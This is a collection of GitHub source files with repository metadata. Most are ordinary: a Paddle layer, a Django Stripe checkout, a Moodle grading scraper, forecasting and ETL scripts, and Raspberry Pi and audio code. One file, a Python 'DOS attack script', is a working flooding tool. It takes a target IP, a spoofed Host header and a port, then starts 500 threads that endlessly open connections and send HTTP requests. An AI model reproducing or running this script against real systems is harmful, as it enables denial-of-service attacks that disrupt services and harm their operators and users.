647530+Virtlink@users.noreply.github.com
|
089fa62ac91f6bcb54a71d72d585c63e4ec9ea6f
|
0c4c05487cc51269527e7be876257a7bc90af2c9
|
/setup.py
|
4c9deb5e69d54a4f65299810e9cecd4268406a81
|
[] |
no_license
|
brightendavid/image_test
|
87f214c026909d797f7b43b75b9b8762d5108480
|
8fee89276a2b39fc9abe29a565c44d88e6e9b79f
|
refs/heads/master
| 2021-09-02T05:23:10.608047
| 2017-12-30T19:02:48
| 2017-12-30T19:02:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 731
|
py
|
from distutils.core import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
setup(
name = 'ela',
version = '1.0',
author = 'Shreyash Sharma',
# The ext modules interface the cpp code with the python one:
ext_modules=[
Extension("ela",
sources=["elawrapper.pyx", "ela.cpp"], # Note, you can link against a c++ library instead of including the source
include_dirs=[".","source" , "/usr/local/include/opencv", "/usr/local/include"],
language="c++",
library_dirs=['/usr/local/lib', 'source', '/usr/lib', '/lib'],
libraries=['opencv_core', 'opencv_highgui'])
],
cmdclass = {'build_ext': build_ext},
)
|
[
"shreyneil@yahoo.co.in"
] |
shreyneil@yahoo.co.in
|
f446b6c8b2833b421592915d637db99761f2c596
|
18aee5d93a63eab684fe69e3aa0abd1372dd5d08
|
/python/paddle/nn/layer/distance.py
|
e2fb10f252f1008f0ddc5e41e1e48afbedb8d67c
|
[
"Apache-2.0"
] |
permissive
|
Shixiaowei02/Paddle
|
8d049f4f29e281de2fb1ffcd143997c88078eadb
|
3d4d995f26c48f7792b325806ec3d110fc59f6fc
|
refs/heads/develop
| 2023-06-26T06:25:48.074273
| 2023-06-14T06:40:21
| 2023-06-14T06:40:21
| 174,320,213
| 2
| 1
|
Apache-2.0
| 2022-12-28T05:14:30
| 2019-03-07T10:09:34
|
C++
|
UTF-8
|
Python
| false
| false
| 3,333
|
py
|
# Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .. import functional as F
from .layers import Layer
__all__ = []
class PairwiseDistance(Layer):
r"""
It computes the pairwise distance between two vectors. The
distance is calculated by p-oreder norm:
.. math::
\Vert x \Vert _p = \left( \sum_{i=1}^n \vert x_i \vert ^ p \right) ^ {1/p}.
Parameters:
p (float, optional): The order of norm. Default: :math:`2.0`.
epsilon (float, optional): Add small value to avoid division by zero.
Default: :math:`1e-6`.
keepdim (bool, optional): Whether to reserve the reduced dimension
in the output Tensor. The result tensor is one dimension less than
the result of ``|x-y|`` unless :attr:`keepdim` is True. Default: False.
name (str, optional): For details, please refer to :ref:`api_guide_Name`.
Generally, no setting is required. Default: None.
Shape:
- x: :math:`[N, D]` or :math:`[D]`, where :math:`N` is batch size, :math:`D`
is the dimension of the data. Available data type is float16, float32, float64.
- y: :math:`[N, D]` or :math:`[D]`, y have the same dtype as x.
- output: The same dtype as input tensor.
- If :attr:`keepdim` is True, the output shape is :math:`[N, 1]` or :math:`[1]`,
depending on whether the input has data shaped as :math:`[N, D]`.
- If :attr:`keepdim` is False, the output shape is :math:`[N]` or :math:`[]`,
depending on whether the input has data shaped as :math:`[N, D]`.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([[1., 3.], [3., 5.]], dtype=paddle.float64)
y = paddle.to_tensor([[5., 6.], [7., 8.]], dtype=paddle.float64)
dist = paddle.nn.PairwiseDistance()
distance = dist(x, y)
print(distance)
# Tensor(shape=[2], dtype=float64, place=Place(gpu:0), stop_gradient=True,
# [4.99999860, 4.99999860])
"""
def __init__(self, p=2.0, epsilon=1e-6, keepdim=False, name=None):
super().__init__()
self.p = p
self.epsilon = epsilon
self.keepdim = keepdim
self.name = name
def forward(self, x, y):
return F.pairwise_distance(
x, y, self.p, self.epsilon, self.keepdim, self.name
)
def extra_repr(self):
main_str = 'p={p}'
if self.epsilon != 1e-6:
main_str += ', epsilon={epsilon}'
if self.keepdim is not False:
main_str += ', keepdim={keepdim}'
if self.name is not None:
main_str += ', name={name}'
return main_str.format(**self.__dict__)
|
[
"noreply@github.com"
] |
noreply@github.com
|
094e3921b57c77c4982b0f0a93f74df051c9f37b
|
ae2ad8f6361a79f332a79ff5a130eceb71a8be82
|
/main.py
|
113defaef88a49fe87ab609a293be7209114ddc7
|
[] |
no_license
|
guipuglia/MoodleEpsReview
|
a419a8874bd7d007463d5243e67896146b60349f
|
9e6a47093fd86817ebe5901edd1a37512bd77d2e
|
refs/heads/master
| 2021-01-10T18:26:38.756145
| 2011-11-11T16:49:51
| 2011-11-11T16:49:51
| 1,973,361
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,266
|
py
|
# -*- coding: utf-8 -*-
import Login
import Parser
import Student
def defineGrades(login):
p = Parser.Parser(login.open('http://paca.ime.usp.br/grade/report/grader/index.php?id=491&perpage=100&page=0&sortitemid=firstname'))
table = p.clean('table','id', 'user-grades')
listSt = p.getStudentsGrades(table)
pp = Parser.Parser(login.open('http://paca.ime.usp.br/mod/assignment/submissions.php?id=12535&tsort=firstname'))
table = pp.clean('table','class', 'flexible submissions')
print table
sst = pp.getStudents(table)
for s in sst:
for e in listSt:
if s.name == e[0]:
# print s
# print e[1]
# print '-------'
comments = ''
grades = e[1]
final = 0
if len(grades) < 2:
final = 0
comments = 'Entregou menos que 2 eps.'
if len(grades) == 2:
final = 20
comments = 'Entregou 2 eps. (REPROVADO)'
elif len(grades) == 3:
final = 30
comments = 'Entregou 3 eps. (RECUPERAÇÃO)'
else:
grades.sort()
if len(grades) == 5:
del grades[0]
for g in grades:
final += float(g)/4
ans = int(final)
if final - float(ans) >= 0.5:
ans += 1
# print str(final) + ' ' + str(ans)
s.reviewEntregou(login, 'http://paca.ime.usp.br/mod/assignment/submissions.php', ans, comments)
print 'publicou'
break
def correctionOfEpMode(login):
#p = Parser(login.open('http://paca.ime.usp.br/mod/assignment/submissions.php?id=12397'))
p = Parser.Parser(login.open('http://paca.ime.usp.br/mod/assignment/submissions.php?id=12435&tsort=firstname'))
table = p.clean('table','class', 'flexible submissions')
st = p.getStudents(table)
for s in st:
if s.fileLink == '':
s.reviewNaoEntregou(login, 'http://paca.ime.usp.br/mod/assignment/submissions.php')
print str(s) + '\nNão entregou'
else:
print s
print "Criando diretório:"
# s.createDir('/home/gui/Dropbox/Mestrado/2011/mac323/EPSub/Eps/')
# print "Baixando arquivo:"
# s.downloadFile(login, '/home/gui/Dropbox/Mestrado/2011/mac323/EPSub/Eps/')
# s.copyFile( '/home/gui/Dropbox/Mestrado/2011/mac323/EPSub/template.txt',
# '/home/gui/Dropbox/Mestrado/2011/mac323/EPSub/Eps/', 'comentario.txt')
print "Parser Nota:"
nota, comments = p.getResults('/home/gui/Dropbox/Mestrado/2011/mac323/EPSub/Eps/' + s.name.replace(' ', '_') + '/comentario.txt')
print str(nota) + ' / 100'
print "Review"
s.reviewEntregou(login, 'http://paca.ime.usp.br/mod/assignment/submissions.php', nota, comments.replace('\n', '<p>\n'))
print '---------------'
if __name__ == '__main__':
# login = Login.Login('7259186', raw_input('Senha: '))
login = Login.Login('7259186', '')
login.connect('username', 'password')
# correctionOfEpMode(login)
defineGrades(login)
|
[
"guiipuglia@gamil.com"
] |
guiipuglia@gamil.com
|
caa4c2efe44602245bbd886dd1a4469c34199a3b
|
0a67e192610eb82779131314de3302452bf542cc
|
/checkout/views.py
|
85bbe441b11f0789565468ffa84983135a8fa1cb
|
[] |
no_license
|
Code-Institute-Submissions/SaraSanchezz-4MilestoneProject_OctResub
|
ad6894f486b6b5cfd652c05fcc056257b960f35e
|
4f9d2b0ec22a4502096199623c43683648a219ba
|
refs/heads/master
| 2023-08-22T00:32:08.503641
| 2021-10-24T11:05:22
| 2021-10-24T11:05:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,898
|
py
|
from django.shortcuts import (
render, redirect, reverse, get_object_or_404, HttpResponse)
from django.views.decorators.http import require_POST
from django.contrib import messages
from django.conf import settings
from .forms import OrderForm
from .models import Order, OrderLineItem
from products.models import Product
from bag.contexts import bag_contents
from profiles.models import UserProfile
from profiles.forms import UserProfileForm
import stripe
import json
# Create your views here.
@require_POST
def cache_checkout_data(request):
try:
pid = request.POST.get('client_secret').split('_secret')[0]
stripe.api_key = settings.STRIPE_SECRET_KEY
stripe.PaymentIntent.modify(pid, metadata={
'bag': json.dumps(request.session.get('bag', {})),
'save_info': request.POST.get('save_info'),
'username': request.user,
})
return HttpResponse(status=200)
except Exception as e:
messages.error(request, 'Sorry your payment cannot be\
processed now')
return HttpResponse(content=e, status=400)
def checkout(request):
stripe_public_key = settings.STRIPE_PUBLIC_KEY
stripe_secret_key = settings.STRIPE_SECRET_KEY
if request.method == 'POST':
bag = request.session.get('bag', {})
form_data = {
'full_name': request.POST['full_name'],
'email': request.POST['email'],
'phone_number': request.POST['phone_number'],
'country': request.POST['country'],
'postcode': request.POST['postcode'],
'town_or_city': request.POST['town_or_city'],
'street_address1': request.POST['street_address1'],
'street_address2': request.POST['street_address2'],
'county': request.POST['county'],
}
order_form = OrderForm(form_data)
if order_form.is_valid():
order = order_form.save(commit=False)
pid = request.POST.get('client_secret').split('_secret')[0]
order.stripe_pid = pid
order.original_bag = json.dumps(bag)
order.save()
for item_id, item_data in bag.items():
try:
product = Product.objects.get(id=item_id)
if isinstance(item_data, int):
order_line_item = OrderLineItem(
order=order,
product=product,
quantity=item_data,
)
order_line_item.save()
else:
for size, quantity in item_data['items_by_size'].items():
order_line_item = OrderLineItem(
order=order,
product=product,
quantity=quantity,
product_size=size,
)
order_line_item.save()
except Product.DoesNotExist:
messages.error(request, (
"One of the products in your bag wasn't "
"found in our database. "
"Please call us for assistance!")
)
order.delete()
return redirect(reverse('view_bag'))
request.session['save_info'] = 'save-info' in request.POST
return redirect(reverse('checkout_success', args=[order.order_number]))
else:
messages.error(request, 'There was an error.\
Please check your details')
else:
bag = request.session.get('bag', {})
if not bag:
messages.error(request, "Your bag is empty")
return redirect(reverse('products'))
current_bag = bag_contents(request)
total = current_bag['grand_total']
stripe_total = round(total * 100)
stripe.api_key = stripe_secret_key
intent = stripe.PaymentIntent.create(
amount=stripe_total,
currency=settings.STRIPE_CURRENCY,
)
# prefill the form with any info the user maintains in their profile
if request.user.is_authenticated:
try:
profile = UserProfile.objects.get(user=request.user)
order_form = OrderForm(initial={
'full_name': profile.user.get_full_name(),
'email': profile.user.email,
'phone_number': profile.default_phone_number,
'country': profile.default_country,
'postcode': profile.default_postcode,
'town_or_city': profile.default_town_or_city,
'street_address1': profile.default_street_address1,
'street_address2': profile.default_street_address2,
'county': profile.default_county,
})
except UserProfile.DoesNotExist:
order_form = OrderForm()
else:
order_form = OrderForm()
if not stripe_public_key:
messages.warning(request, 'stripe public key is missing')
template = 'checkout/checkout.html'
context = {
'order_form': order_form,
'stripe_public_key': stripe_public_key,
'client_secret': intent.client_secret,
}
return render(request, template, context)
def checkout_success(request, order_number):
save_info = request.session.get('save_info')
order = get_object_or_404(Order, order_number=order_number)
if request.user.is_authenticated:
profile = UserProfile.objects.get(user=request.user)
# Attach the user's profile to the order
order.user_profile = profile
order.save()
# Save the user's info
if save_info:
profile_data = {
'default_phone_number': order.phone_number,
'default_country': order.country,
'default_postcode': order.postcode,
'default_town_or_city': order.town_or_city,
'default_street_address1': order.street_address1,
'default_street_address2': order.street_address2,
'default_county': order.county,
}
user_profile_form = UserProfileForm(profile_data, instance=profile)
if user_profile_form.is_valid():
user_profile_form.save()
messages.success(request, f'Order successfully processed! \
Your order number is {order_number}. A confirmation \
email will be sent to {order.email}.')
if 'bag' in request.session:
del request.session['bag']
template = 'checkout/checkout_success.html'
context = {
'order': order,
}
return render(request, template, context)
|
[
"sarasanrodrigo@gmail.com"
] |
sarasanrodrigo@gmail.com
|
50ddef3e12604adbe00d3db3058a99758b1c10a0
|
e02af62b3d0b8737a728b8169b91c37b7b99d0ab
|
/main.py
|
43fc35413573f68d256ac16ab919537e9c42fe30
|
[] |
no_license
|
z9fr/DOS-Attack-Script
|
debaa6f7e7d04caaa658407d16208e4da2c32927
|
098920523bf5c152a86e1e32a8298f908f7f24fe
|
refs/heads/main
| 2023-03-22T01:45:19.137301
| 2021-03-22T18:51:46
| 2021-03-22T18:51:46
| 313,788,301
| 11
| 5
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,604
|
py
|
import socket
import threading
#target_ip = '195.20.52.179'
#fake_ip = '182.21.20.32'
#port = 80
print("\n\n")
print(" +-------------------------------------+")
print(" | nov, 18th, 2020 |")
print(" | This is a simple DOS attack script |")
print(" | Github: https://github.com/d4az |")
print(" | Author: Dasith Vidanage |")
print(" | Version: 0.1 |")
print(" +---------------------------d4az------+ ")
print("\n\n")
print("Enter ip Address of The Target ")
print("To Get the ip adress You can ping the domain in the terminal. eg #target = '120.00.00.000'")
target = input("\t == > ")
print("Enter The Fake Ip Address that you wants to spoof. eg: #fake_ip = '120.00.00.01' ")
fake_ip = input("\t\t ==> ")
print("Enter The Port Number You Want to Attack ? ")
port = input("\t\t ==> ")
port = int(port)
attack_num = 0
print("Sending Packets...")
def attack():
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.sendto(("GET /" + target + " HTTP/1.1\r\n").encode('ascii'), (target, port))
s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target, port))
global attack_num
attack_num += 1
packesnum =attack_num
packesnum= str(packesnum)
print("Packets Sending => "+packesnum)
print("Done")
s.close()
print("Packets Send Sucess!")
for i in range(500):
thread = threading.Thread(target=attack)
thread.start()
|
[
"noreply@github.com"
] |
noreply@github.com
|
cc7d477682c93f80dadceaf8917cd2381faf4d91
|
3cbf2c8d87e7cd187a94059ae985289319661343
|
/starschema.py
|
dd0a62a95fd8359b1c84e40502db1e3ef8e7abcd
|
[] |
no_license
|
SkNuwanTissera/Wtrainer
|
a8c6173ea18818826df118f2204f2187cfda4cd5
|
36dc5a669c8a617ebf8425dc51b388f954dcbd2c
|
refs/heads/master
| 2022-11-26T21:33:46.119592
| 2020-08-01T05:35:49
| 2020-08-01T05:35:49
| 283,975,245
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,230
|
py
|
#######################################################################
# READ THIS BEFORE EXECUTION
#######################################################################
# This script will delete the current db file and create a new db file
# with all new data in JSON. This has an limitation when it comes to
# adding more data that needs to be append to the database.
########################################################################
import json
import os
from datetime import datetime
from sqlalchemy import *
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
from sqlalchemy.sql import *
# Removing current DB file
os.remove("star.db")
print("\nCurrent DB File Removed!")
engine = create_engine('sqlite:///star.db')
Base = declarative_base()
# read file
print('\nReading JSON ...')
with open('course_data.json', 'r') as myfile:
data = myfile.read()
# parse file
obj = json.loads(data)
# Defining the schemas
# Course Dimension
class Course(Base):
__tablename__ = "course_dimension"
Id = Column(Integer, primary_key=True)
CourseId = Column(String)
CourseTitle = Column(String)
IsPaid = Column(Boolean)
Price = Column(Float)
NumOfSubscribers = Column(Integer)
NumOfReviews = Column(Integer)
NumOfLectures = Column(Integer)
Level = Column(String)
ContentDuration = Column(Float)
PublishedTimestamp = Column(DateTime)
Subject = Column(String)
# Author Dimension
class Author(Base):
__tablename__ = "author_dimension"
AuthorId = Column(Integer, primary_key=True)
Author = Column(String)
FirstName = Column(String)
LastName = Column(String)
AuthorCode = Column(String)
# Date Dimension
class Date(Base):
__tablename__ = "date_dimension"
DateId = Column(Integer, primary_key=True)
Month = Column(Integer)
Year = Column(Integer)
Timestamp = Column(TIMESTAMP)
# Fact Table
# Sales Fact Table
class Sales(Base):
__tablename__ = "sales_fact"
SalesId = Column(Integer, primary_key=true)
CourseId = Column(Integer)
AuthorId = Column(Integer)
DateId = Column(Integer)
NumOfSubscribers = Column(Integer)
Price = Column(Float)
# Drop current tables
# Course.__table__.drop(engine)
# Author.__table__.drop(engine)
# Date.__table__.drop(engine)
# Sales.__table__.drop(engine)
# Create new tables
print('Creating new tables ...')
Course.__table__.create(bind=engine, checkfirst=true)
Author.__table__.create(bind=engine, checkfirst=true)
Date.__table__.create(bind=engine, checkfirst=true)
Sales.__table__.create(bind=engine, checkfirst=true)
# Data transformation
print('Data Transformation on Process ...')
sales_fact, date_dimension, author_dimension, course_dimension = [], [], [], []
for i, result in enumerate(obj['course_id']):
course_row = {}
author_row = {}
date_row = {}
sales_row = {}
course_row['Id'] = i + 1
course_row['CourseId'] = str(obj['course_id'][str(i)])
course_row['CourseTitle'] = str(obj['course_title'][str(i)])
course_row['IsPaid'] = bool(obj['is_paid'][str(i)])
course_row['Price'] = float(obj['price'][str(i)])
course_row['NumOfSubscribers'] = int(obj['num_subscribers'][str(i)])
course_row['NumOfReviews'] = int(obj['num_reviews'][str(i)])
course_row['NumOfLectures'] = int(obj['num_lectures'][str(i)])
course_row['Level'] = str(obj['level'][str(i)])
course_row['ContentDuration'] = float(obj['content_duration'][str(i)])
date = datetime.strptime(obj['published_timestamp'][str(i)], '%Y-%m-%dT%H:%M:%SZ')
course_row['PublishedTimestamp'] = date.date()
course_row['Subject'] = str(obj['subject'][str(i)])
sales_row['SalesId'] = i + 1
sales_row['CourseId'] = str(obj['course_id'][str(i)])
sales_row['AuthorId'] = str(obj['author'][str(i)])
sales_row['DateId'] = i + 1
sales_row['NumOfSubscribers'] = int(obj['num_subscribers'][str(i)])
sales_row['Price'] = float(obj['price'][str(i)])
date_row['DateId'] = i + 1
month = str(date).split(' ')[0].split('-')[1]
year = str(date).split(' ')[0].split('-')[0]
date_row['Month'] = str(month)
date_row['Year'] = str(year)
date_row['Timestamp'] = date.date()
author_row['AuthorId'] = i + 1
author_row['Author'] = str(obj['author'][str(i)])
author_row['FirstName'] = str(obj['author'][str(i)]).split('_')[0]
author_row['LastName'] = str(obj['author'][str(i)]).split('_')[1] # split
author_row['AuthorCode'] = str(obj['author'][str(i)]).split('_')[2] # split
course_dimension.append(course_row)
sales_fact.append(sales_row)
date_dimension.append(date_row)
author_dimension.append(author_row)
# Load to database - seeding
print('Loading data to database ...')
Session = sessionmaker(bind=engine)
session = Session()
for course in course_dimension:
row = Course(**course)
session.add(row)
for dateData in date_dimension:
row = Date(**dateData)
session.add(row)
for authorData in author_dimension:
row = Author(**authorData)
session.add(row)
for salesData in sales_fact:
row = Sales(**salesData)
session.add(row)
session.commit()
print("\nSuccessfully Completed The Process !!")
|
[
"nuwan.tissera@my.sliit.lk"
] |
nuwan.tissera@my.sliit.lk
|
951368bbcf5ba887bbf79ec62af53c593f6f56e3
|
4ba1d93c5930afca3c5831504f02403999df1d9c
|
/Forecasting_cococola.py
|
955a8bcb152f483b33b183188453502b9de1b00e
|
[] |
no_license
|
Isiribn/Forecasting
|
39273142f93cc657e1e77ac05180c55b4b1287db
|
ddb8065aa2a677e5ac42a7a7248ec953843341ba
|
refs/heads/main
| 2023-04-01T05:57:44.900968
| 2021-04-09T11:28:58
| 2021-04-09T11:28:58
| 356,242,339
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,661
|
py
|
#!/usr/bin/env python
# coding: utf-8
# In[1]:
import pandas as pd
data=pd.read_excel('CocaCola_Sales_Rawdata.xlsx')
data.head()
# In[2]:
data.shape
# In[3]:
data.isnull().any()
# In[4]:
data.duplicated().any()
# In[5]:
data.info()
# In[6]:
data.describe()
# In[7]:
data.hist()
# In[10]:
import matplotlib.pyplot as plt
data.Sales.plot(label="org")
for i in range(2, 10, 2):
data["Sales"].rolling(i).mean().plot(label=str(i))
plt.legend(loc=3)
# In[11]:
data.plot(kind='kde')
# In[12]:
import statsmodels.api as sm
from statsmodels.tsa.seasonal import seasonal_decompose
from statsmodels.tsa.holtwinters import SimpleExpSmoothing # SES
from statsmodels.tsa.holtwinters import Holt # Holts Exponential Smoothing
from statsmodels.tsa.holtwinters import ExponentialSmoothing
import statsmodels.graphics.tsaplots as tsa_plots
import statsmodels.tsa.statespace as tm_models
#from datetime import datetime,time
# In[13]:
tsa_plots.plot_acf(data.Sales,lags=10)
tsa_plots.plot_pacf(data.Sales)
# In[14]:
train=data.head(48)
test=data.tail(12)
# In[15]:
import numpy as np
def MAPE(pred,org):
temp=np.abs((pred-org))*100/org
return np.mean(temp)
# In[16]:
#Simple Exponential Smoothing
ses_model=SimpleExpSmoothing(train["Sales"]).fit()
pred_ses=ses_model.predict(start=test.index[0],end=test.index[-1])
MAPE(pred_ses,test.Sales)
# In[17]:
#Holt Exponential smoothing
hw_model=Holt(train["Sales"]).fit()
pred_hw=hw_model.predict(start=test.index[0], end=test.index[-1])
MAPE(pred_hw,test.Sales)
# In[18]:
hwe_model_add_add = ExponentialSmoothing(train["Sales"],seasonal="add",trend="add",seasonal_periods=4,damped=True).fit()
pred_hwe_add_add = hwe_model_add_add.predict(start = test.index[0],end = test.index[-1])
MAPE(pred_hwe_add_add,test.Sales)
# In[19]:
hwe_model_mul_add = ExponentialSmoothing(train["Sales"],seasonal="mul",trend="add",seasonal_periods=4).fit()
pred_hwe_mul_add = hwe_model_mul_add.predict(start = test.index[0],end = test.index[-1])
MAPE(pred_hwe_mul_add,test.Sales)
# In[20]:
plt.plot(train.index, train["Sales"], label='Train',color="r")
# In[21]:
plt.plot(test.index, test["Sales"], label='Test',color="blue")
# In[22]:
plt.plot(pred_ses.index, pred_ses, label='SimpleExponential',color="green")
plt.plot(pred_hw.index, pred_hw, label='Holts_winter',color="red")
# In[23]:
plt.plot(pred_hwe_add_add.index,pred_hwe_add_add,label="HoltsWinterExponential_1",color="brown")
plt.plot(pred_hwe_mul_add.index,pred_hwe_mul_add,label="HoltsWinterExponential_2",color="yellow")
plt.legend(loc='best')
# In[ ]:
# In[ ]:
# In[ ]:
|
[
"noreply@github.com"
] |
noreply@github.com
|
563546f5b953d8a2b7b512856a99df5b88aef108
|
bc23a3734e3ae3be64c6e5a1ae94204552d1a554
|
/Arrays and Strings/06_findAinBOfString.py
|
7556ff9313cf7b568601a6be3437ae664db28a80
|
[] |
no_license
|
mmrraju/Coding-interview-preparation
|
c3c2fc91c5ccbb383f4672af4ea77f169281529c
|
738949fe7bc6e50d4bd55ac0b2b47c002ca0f464
|
refs/heads/main
| 2023-08-29T16:06:46.990849
| 2021-10-20T07:15:46
| 2021-10-20T07:15:46
| 408,050,819
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 852
|
py
|
""" Given two stings ransomNote and magazine, return true if ransomNote can be constructed from magazine and false otherwise.
Each letter in magazine can only be used once in ransomNote """
magazine = input()
ransomNote = input()
def isMagazineInRansomNote(magazine, ransomNote):
d = {}
for ch in magazine:
if ch not in d:
d[ch] = 1
else:
d[ch] += 1
for ch in ransomNote:
if ch not in d:
return False
else: #if char present chech the count and reduce it
if d[ch] > 1:
d[ch] -= 1
else: # if char less then 1 and again appear delete it
del d[ch]
return True
print(isMagazineInRansomNote(magazine, ransomNote))
|
[
"noreply@github.com"
] |
noreply@github.com
|
46733eaf24c7a1380cffa1e8c03d6f2273e2c0eb
|
5a6e6741fe7c64cb99b6fbff66ab332d3563ffa9
|
/src/interaction/dot.py
|
3e15b615f1a9f926b58d39b9c4882b45fb67e862
|
[] |
no_license
|
gowhale/braille-pi
|
06c9fdf05f0bc5a8ae3f2c18cb74e2c487e103dc
|
d184e7cc2f4cc6f339186a85057922706fc69a8a
|
refs/heads/dev
| 2023-07-18T05:27:21.156461
| 2021-08-27T14:01:08
| 2021-08-27T14:01:08
| 320,604,946
| 0
| 0
| null | 2021-08-16T12:52:21
| 2020-12-11T15:02:02
|
Python
|
UTF-8
|
Python
| false
| false
| 1,376
|
py
|
import RPi.GPIO as GPIO
from random import randrange
class Dot ():
"""This class links the hardware's dots to the code's dots.
Attributes:
gpio_pin (Int) Value of the GPIO pin each dot is connected to.
braille_dot (Int) Which dot out of 6 this object represents.
value (Boolean) Whether the dot is active or not."""
gpio_pin = 0
braille_dot = 0
value = False
def __init__(self, dot, gpio_pin):
"""Initialises the Dot class.
Parameters:
dot (Int) Value of the GPIO pin each dot is connected to.
gpio_pin (Int) Which dot out of 6 this object represents."""
self.braille_dot = dot
self.gpio_pin = gpio_pin
GPIO.setup(gpio_pin, GPIO.OUT)
GPIO.output(gpio_pin, GPIO.LOW)
self.update_value()
def get_value(self):
"""Gets the value of the physcical button. i.e. high or low"""
return self.value
def update_value(self):
"""Updates the Dot's registered value."""
current_val = GPIO.input(self.gpio_pin)
if current_val:
self.value = 0
else:
self.value = 1
def get_current_value(self):
"""Updates the Dot's value and then returns it."""
self.update_value()
return self.get_value()
|
[
"gabewhale@gmail.com"
] |
gabewhale@gmail.com
|
d7c0287fb7a3ef5af824015f71ad03d55a1bcc74
|
83714c643612926730641c95a2a656a3ac1a38be
|
/dsp_hw4/demo8_exe6/echo_input_output.py
|
f5e27f1ecff0794466479f7c4f070d315d5e9f1e
|
[] |
no_license
|
maying0120/Dsp-Lab-NYU6183
|
122a71f0ec63acf844861ea1b398045998d5bf8f
|
0a6cdf5ea899caaab50e8b69b73d2755112b045c
|
refs/heads/master
| 2023-01-14T11:37:24.525234
| 2020-11-22T06:00:41
| 2020-11-22T06:00:41
| 314,956,844
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,674
|
py
|
# echo_with_mic_input.py
import pyaudio
import wave
import struct
from myfunctions import clip16
WIDTH = 2 # Number of bytes per sample
CHANNELS = 1 # mono
RATE = 16000 # Sampling rate (frames/second)
DURATION = 2 # duration of processing (seconds)
N_samples = DURATION * RATE # N : Number of samples to process
print('The number of channels(s) is %d ' % CHANNELS)
print('The frame rate is %d frames/second.' % RATE)
print('There are %d bytes per sample.' % WIDTH)
# Set parameters of delay system
b0 = 1.0 # direct-path gain
G = 0.8 # feed-forward gain
delay_sec = 0.05 # delay in seconds, 50 milliseconds Try delay_sec = 0.02
N = int( RATE * delay_sec ) # delay in samples
print('The delay of %.3f seconds is %d samples.' % (delay_sec, N))
# Buffer to store past signal values. Initialize to zero.
BUFFER_LEN = N # length of buffer
buffer = BUFFER_LEN * [0] # list of zeros
# Open an output audio stream
p = pyaudio.PyAudio()
stream = p.open(format = pyaudio.paInt16,
channels = 1,
rate = RATE,
input = True,
output = True )
# Initialize buffer index (circular index)
k = 0
# Write to wave file
wf1 = wave.open('output.wav', 'w') # wf : wave file
num_channels = 1 # mono
DURATION = 2 # duration of processing (seconds)
RATE = 16000 # Sampling rate (frames/second)
N = DURATION * RATE # N : Number of samples to process
wf1.setnchannels(1) # one channel (mono)
wf1.setsampwidth(2) # Two bytes per sample (16 bits per sample)
wf1.setframerate(16000) # samples per second
print('* Start')
for n in range(0, N_samples):
# Get one frame from audio input (microphone)
input_bytes = stream.read(1, exception_on_overflow = False)
# Convert binary data to tuple of numbers
input_number = struct.unpack('h', input_bytes)
print(input_number)
x0=input_number[0]
# Compute output value
# y(n) = b0 x(n) + G x(n-N)
y0 = b0 * x0 + G * buffer[k]
# Update buffer
buffer[k] = x0
# Increment buffer index
k = k + 1
if k >= BUFFER_LEN:
# The index has reached the end of the buffer. Circle the index back to the front.
k = 0
# Clip and convert output value to binary data
output_bytes = struct.pack('h', int(clip16(y0)))
wf1.writeframes(output_bytes)
# Write output value to audio stream
stream.write(output_bytes)
print('* Finished')
stream.stop_stream()
stream.close()
p.terminate()
wf1.close()
|
[
"maying012@gmail.com0"
] |
maying012@gmail.com0
|
7e8f54959ba00bb2e701fd4aa3e06bdcd1633614
|
1cfc8c4b48a85feeab5c45199e69454cc7e01f75
|
/facebook_downloader/cli.py
|
47124b08787a3c6bc60c9c1dedfc867e804f15f5
|
[
"MIT"
] |
permissive
|
swapnil-altsmedia/facebook-ads-performance-downloader
|
7b2b220bc2cf6c20e4fb1ce1c111248a4298af59
|
b60927e8e3b79516de950d2660c8dc5eb410ee48
|
refs/heads/master
| 2021-01-19T20:06:07.486724
| 2017-03-01T09:55:20
| 2017-03-13T16:23:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,090
|
py
|
"""Command line interface for facebook downloader"""
from functools import partial
import click
from facebook_downloader import config, downloader
def config_option(config_function):
"""Helper decorator that turns an option function into a cli option"""
return lambda function: \
click.option('--' + config_function.__name__,
help=config_function.__doc__.strip() + '. Example: "' + config_function() + '"') \
(function)
def apply_options(kwargs):
"""Applies passed cli parameters to config.py"""
for key, value in kwargs.items():
if value: setattr(config, key, partial(lambda v: v, value))
@click.command()
@config_option(config.app_id)
@config_option(config.app_secret)
@config_option(config.access_token)
@config_option(config.data_dir)
@config_option(config.first_date)
@config_option(config.redownload_window)
def download_data(**kwargs):
"""
Downloads data.
When options are not specified, then the defaults from config.py are used.
"""
apply_options(kwargs)
downloader.download_data()
|
[
"hendrik.makait@project-a.com"
] |
hendrik.makait@project-a.com
|
71430c67e95fb12ba1c50e236cd10864470a4b1f
|
a06fe2de2e7644fe51da23b672d512f471c2cd95
|
/prueba.py
|
843decea70e907e3c30b0d217458426e4583b5b2
|
[] |
no_license
|
ANVRRT/Intelligent-Business-Advisor_OutDated
|
7d9d1963e8c9819fffdabc67da6c7900ef322dd8
|
2c647f2a742a309992b9b2f6797eece9ebd78b51
|
refs/heads/main
| 2023-06-29T23:48:30.867779
| 2021-08-09T21:02:03
| 2021-08-09T21:02:03
| 390,874,182
| 0
| 0
| null | null | null | null |
UTF-8
|
